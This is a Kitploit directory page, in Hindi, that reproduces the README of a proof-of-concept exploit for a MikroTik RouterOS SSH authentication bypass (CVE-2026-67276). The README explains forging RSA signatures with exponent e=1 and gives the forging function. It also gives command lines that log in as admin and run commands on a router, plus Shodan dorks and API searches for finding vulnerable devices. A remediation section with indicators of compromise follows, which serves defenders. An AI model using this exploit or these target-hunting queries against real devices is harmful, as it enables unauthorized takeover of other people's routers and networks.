Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
exploit-mikrotik-2026 — CVE-2026-67276 MikroTik RouterOS SSH प्रमाणीकरण बाईपास एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/blackhatexploitation/exploit-mikrotik-2026
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubblackhatexploitation/exploit-mikrotik-2026

exploit-mikrotik-2026

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-67276 MikroTik RouterOS SSH प्रमाणीकरण बाईपास एक्सप्लॉइट

रिपॉजिटरी देखें
8घं 17मि पहलेअभी तक समीक्षित नहीं

CVE-2026-67276 - MikroTik SSH प्रमाणीकरण बाईपास एक्सप्लॉइट

CVE Severity Type Platform

MikroTik RouterOS SSH सार्वजनिक कुंजी प्रमाणीकरण बाईपास - निजी कुंजी की आवश्यकता नहीं

CVE-2026-67276 (MikroTrick) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो MikroTik RouterOS SSH कार्यान्वयन में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है, जो हमलावरों को उनकी निजी कुंजी के बिना किसी भी उपयोगकर्ता के रूप में प्रमाणित करने की अनुमति देता है।


विषय-सूची

  • भेद्यता अवलोकन
  • यह कैसे काम करता है
  • प्रभावित संस्करण
  • स्थापना
  • उपयोग
  • Shodan टोही
  • तकनीकी विवरण
  • उपचार
  • संदर्भ
  • अस्वीकरण

भेद्यता अवलोकन

MikroTrick हमला श्रृंखला

CVE-2026-67276 एक बड़ी हमला श्रृंखला का हिस्सा है जिसे CERT PL द्वारा "MikroTrick" नाम दिया गया है, जिसे वास्तविक दुनिया में सक्रिय रूप से शोषित होते देखा गया था:


यह कैसे काम करता है

भेद्यता

RouterOS SSH प्रमाणीकरण में सार्वजनिक कुंजी को मान्य करने के तरीके में एक गंभीर दोष है:

  1. कुंजी मिलान बग: RouterOS प्रस्तुत SSH सार्वजनिक-कुंजी ब्लॉब को केवल (कुंजी प्रकार, मापांक) का उपयोग करके अधिकृत कुंजियों के विरुद्ध मिलाता है, घातांक को पूरी तरह से छोड़ देता है
  2. क्लाइंट से घातांक: हस्ताक्षर सत्यापन संग्रहीत कुंजी से नहीं, बल्कि क्लाइंट-आपूर्ति किए गए ब्लॉब से घातांक का उपयोग करता है
  3. तुच्छ जालसाजी: {ssh-rsa, e=1, n=victim_modulus} प्रस्तुत करने से सत्यापन तुच्छ हो जाता है

गणितीय आधार

root@kitploit:~
मानक RSA सत्यापन:  sig^65537 mod n == अपेक्षित  (निजी कुंजी की आवश्यकता है)
शोषित सत्यापन:     sig^1 mod n == sig           (कोई निजी कुंजी आवश्यक नहीं!)

घातांक e=1 के साथ, हस्ताक्षर सत्यापन बन जाता है:

root@kitploit:~
sig^1 mod n == sig

इसका मतलब है कि "हस्ताक्षर" केवल EMSA-PKCS1-v1_5 एन्कोडेड संदेश ही है - जो कोई भी पीड़ित के सार्वजनिक मापांक को जानता है उसके द्वारा निर्माण योग्य।

हमले की पूर्वापेक्षाएँ

  1. अधिकृत RSA कुंजी वाले खाते का लक्ष्य उपयोगकर्ता नाम
  2. उस अधिकृत कुंजी का RSA सार्वजनिक मापांक n (.pub फ़ाइल, पिछले कनेक्शन आदि से)
  3. SSH पोर्ट तक नेटवर्क पहुंच

प्रभावित संस्करण

शाखाभेद्य सीमापैच किया गया संस्करण
6.x6.0 - 6.49.206.49.21+

स्थापना

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/BlackHatExploitation/exploit-mikrotik-2026.git
cd exploit-mikrotik-2026

# निर्भरताएँ स्थापित करें
pip install paramiko cryptography

उपयोग

त्वरित प्रारंभ

root@kitploit:~
# बुनियादी एक्सप्लॉइट - स्वचालित रूप से कुंजी उत्पन्न करता है, संस्करण का पता लगाता है
python3 full_exploit.py --host 192.168.88.1 --username admin

# प्रमाणीकरण के बाद कमांड निष्पादित करें
python3 full_exploit.py --host 192.168.88.1 --username admin --exec '/system resource print'

# कस्टम पोर्ट
python3 full_exploit.py --host 192.168.88.1 --port 2222 --username admin

मौजूदा सार्वजनिक कुंजी का उपयोग करना

root@kitploit:~
# यदि आपके पास पीड़ित की सार्वजनिक कुंजी फ़ाइल है
python3 full_exploit.py --host 192.168.88.1 --username admin --pubkey victim.pub

# या मापांक सीधे प्रदान करें
python3 full_exploit.py --host 192.168.88.1 --username admin --modulus-hex "00:ab:cd:..."

संस्करण का पता लगाना

एक्सप्लॉइट स्वचालित रूप से RouterOS संस्करण का पता लगाता है और भेद्यता स्थिति की जाँच करता है:

root@kitploit:~
# गैर-MikroTik या अज्ञात संस्करण पर भी एक्सप्लॉइट को बलपूर्वक चलाएँ
python3 full_exploit.py --host 192.168.88.1 --username admin --skip-version-check

सभी विकल्प

root@kitploit:~
--host              लक्ष्य RouterOS IP/होस्टनाम (आवश्यक)
--port              SSH पोर्ट (डिफ़ॉल्ट: 22)
--username          लक्ष्य RouterOS उपयोगकर्ता नाम (आवश्यक)
--pubkey            RSA सार्वजनिक कुंजी फ़ाइल (प्रदान न करने पर स्वचालित रूप से उत्पन्न होती है)
--modulus-hex       हेक्स के रूप में RSA मापांक (--pubkey का विकल्प)
--algos             हस्ताक्षर एल्गोरिदम (डिफ़ॉल्ट: ssh-rsa,rsa-sha2-256)
--exec              प्रमाणीकरण के बाद निष्पादित करने के लिए कमांड
--exp-enc           घातांक एन्कोडिंग: कैनोनिकल (1 बाइट) या संरेखित (3 बाइट)
--timeout           कनेक्शन टाइमआउट (डिफ़ॉल्ट: 15.0 सेकंड)
--skip-version-check    RouterOS संस्करण सत्यापन छोड़ें
--shodan-dorks      Shodan खोज क्वेरी प्रिंट करें
--shodan-search     लक्ष्यों के लिए Shodan API खोजें
--shodan-key        Shodan API कुंजी
--shodan-query      कस्टम Shodan क्वेरी
--shodan-limit      Shodan परिणाम सीमा (डिफ़ॉल्ट: 100)

Shodan टोही

Dorks प्रिंट करें

root@kitploit:~
python3 full_exploit.py --shodan-dorks

Shodan API खोजें

root@kitploit:~
# बुनियादी खोज
python3 full_exploit.py --shodan-search --shodan-key YOUR_API_KEY

# कस्टम क्वेरी
python3 full_exploit.py --shodan-search --shodan-key YOUR_KEY --shodan-query 'MikroTik port:22 country:US'

उपयोगी Shodan क्वेरी


तकनीकी विवरण

SSH सार्वजनिक कुंजी ब्लॉब संरचना

root@kitploit:~
string    "ssh-rsa"
mpint     e (सार्वजनिक घातांक)  <- हमलावर e=1 प्रदान करता है
mpint     n (मापांक)          <- पीड़ित का वास्तविक मापांक

जाली हस्ताक्षर निर्माण

root@kitploit:~
# "हस्ताक्षर" केवल EMSA-PKCS1-v1_5 एन्कोडेड प्रमाणीकरण डेटा है
def forged_signature(data, sig_alg, n):
    k = (n.bit_length() + 7) // 8
    block = emsa_pkcs1_v15(data, sig_alg, k)
    return block  # यह e=1 होने पर मान्य हस्ताक्षर है

वायर प्रारूप नोट्स

  • ब्लॉब का आंतरिक प्रकार स्ट्रिंग rsa-sha2-256/512 एल्गोरिदम के लिए भी ssh-rsa ही रहता है
  • हस्ताक्षर एल्गोरिदम केवल बाहरी एल्गोरिदम फ़ील्ड में जाता है
  • कैनोनिकल (1 बाइट) और संरेखित (3 बाइट) दोनों e=1 एन्कोडिंग भेद्य संस्करणों पर काम करते हैं

उदाहरण आउटपुट

root@kitploit:~
[*] CVE-2026-67276 MikroTrick एक्सप्लॉइट
[*] लक्ष्य: 192.168.88.1:22

[*] RouterOS संस्करण का पता लगा रहा है...
[*] SSH बैनर: SSH-2.0-ROSSSH-7.23.3
[*] RouterOS संस्करण: 7.23.3
[+] संस्करण भेद्य है - CVE-2026-67276 लागू होता है

[*] 2048-बिट RSA कुंजी जोड़ी उत्पन्न कर रहा है...
[+] निजी कुंजी सहेजी गई: /path/to/exploit_key
[+] सार्वजनिक कुंजी सहेजी गई:  /path/to/exploit_key.pub
[*] मापांक: 2048-बिट | जाली e=1
[*] घातांक एन्कोडिंग: कैनोनिकल (01)

[*] rsa-sha2-256 आज़मा रहा है...
[+] 'admin' के रूप में rsa-sha2-256 के माध्यम से प्रमाणित
[+] CVE-2026-67276 पुष्टि - लक्ष्य भेद्य है
--- कमांड आउटपुट ---
                uptime: 14d23h45m12s
               version: 7.23.3 (stable)
            build-time: Sep/01/2026 12:00:00

उपचार

1. तुरंत अपग्रेड करें

root@kitploit:~
# वर्तमान संस्करण जांचें
/system resource print

# पैच किए गए संस्करण में अपग्रेड करें
/system package update download
/system reboot

न्यूनतम सुरक्षित संस्करण:

  • 6.x शाखा: 6.49.21
  • 7.x स्थिर: 7.23.4
  • 7.x परीक्षण: 7.24.2

2. यदि आवश्यक न हो तो SSH अक्षम करें

root@kitploit:~
/ip service disable ssh

3. SSH पहुंच प्रतिबंधित करें

root@kitploit:~
# IP पते द्वारा
/ip service set ssh address=192.168.88.0/24

# फ़ायरवॉल नियम
/ip firewall filter add chain=input dst-port=22 protocol=tcp \
    src-address=!192.168.88.0/24 action=drop

4. समझौते की जाँच करें

root@kitploit:~
# संदिग्ध उपयोगकर्ताओं की जाँच करें
/user print

# "ops" उपयोगकर्ता की जाँच करें (ज्ञात हमलावर संकेतक)
/user print where name=ops

# डिवाइस फ़्लैग्ड स्थिति जाँचें
/system/device-mode/print

# लॉग जाँचें
/log print where topics~"ssh"

ज्ञात IOCs:

  • लॉग प्रविष्टियाँ: login failure for user -2 via ssh
  • अज्ञात विशेषाधिकार प्राप्त उपयोगकर्ता ops
  • डिवाइस "Flagged" मार्कर
  • हमलावर IP: 82.192.72.4, 103.102.31.18

संदर्भ

  • CERT PL सलाह
  • CERT PL CVE विवरण
  • MikroTik सुरक्षा बुलेटिन
  • RFC 8017 - PKCS#1 v2.2
  • RFC 8332 - SSH में SHA-256/512 के साथ RSA कुंजियों का उपयोग
  • RFC 4252 - SSH प्रमाणीकरण प्रोटोकॉल

अस्वीकरण

⚠️ यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।

  • केवल उन प्रणालियों के विरुद्ध उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर प्रणालियों तक अनधिकृत पहुंच CFAA, कंप्यूटर दुरुपयोग अधिनियम और दुनिया भर के समान कानूनों के तहत अवैध है
  • लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं
  • इस उपकरण का उपयोग करके, आप इसे जिम्मेदारी से और कानूनी रूप से उपयोग करने के लिए सहमत हैं

लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE देखें।


लेखक

सुरक्षा अनुसंधान PoC - CVE-2026-67276 लैब कार्यान्वयन

यदि यह उपयोगी लगे तो इस रिपॉजिटरी को स्टार करें!

टूल डाउनलोड करें
विवरणजानकारी
CVE IDCVE-2026-67276
गंभीरतागंभीर (CVSS 9.8)
CWECWE-347 (क्रिप्टोग्राफिक हस्ताक्षर का अनुचित सत्यापन)
हमला वेक्टरनेटवर्क
प्रमाणीकरणकोई नहीं
जटिलताकम
प्रभावपूर्ण डिवाइस समझौता
CVEप्रकारविवरण
CVE-2026-67276प्रमाणीकरण बाईपासघातांक जालसाजी के माध्यम से SSH सार्वजनिक कुंजी प्रमाणीकरण बाईपास
CVE-2026-86060विशेषाधिकार वृद्धिउपयोगकर्ता नाम के माध्यम से तर्क इंजेक्शन
CVE-2026-67279प्रमाणीकरण बाईपासपूर्ण userauth के बिना SSH कनेक्शन
CVE-2026-67277सूचना प्रकटीकरणbandwidth-test के माध्यम से कर्नेल मेमोरी रिसाव
CVE-2026-67278हस्ताक्षर बाईपासX.509 गलत हस्ताक्षर स्वीकृति
CVE-2026-67281फ़ाइल पठनjsproxy के माध्यम से WebFig रूट फ़ाइल पठन
7.x स्थिर
7.0 - 7.23.3
7.23.4+
7.x परीक्षण7.24.0 - 7.24.17.24.2+
लक्ष्यक्वेरी
सभी MikroTikMikroTik
MikroTik SSHMikroTik port:22
Winbox एक्सपोज़्डport:8291
WebFig पैनलhttp.title:RouterOS
RouterOS 6.49.xMikroTik "6.49"
RouterOS 7.xMikroTik "RouterOS v7"
देश के अनुसारMikroTik country:US
भेद्य संकेतMikroTik ("6.49" OR "7.23" OR "7.24.0")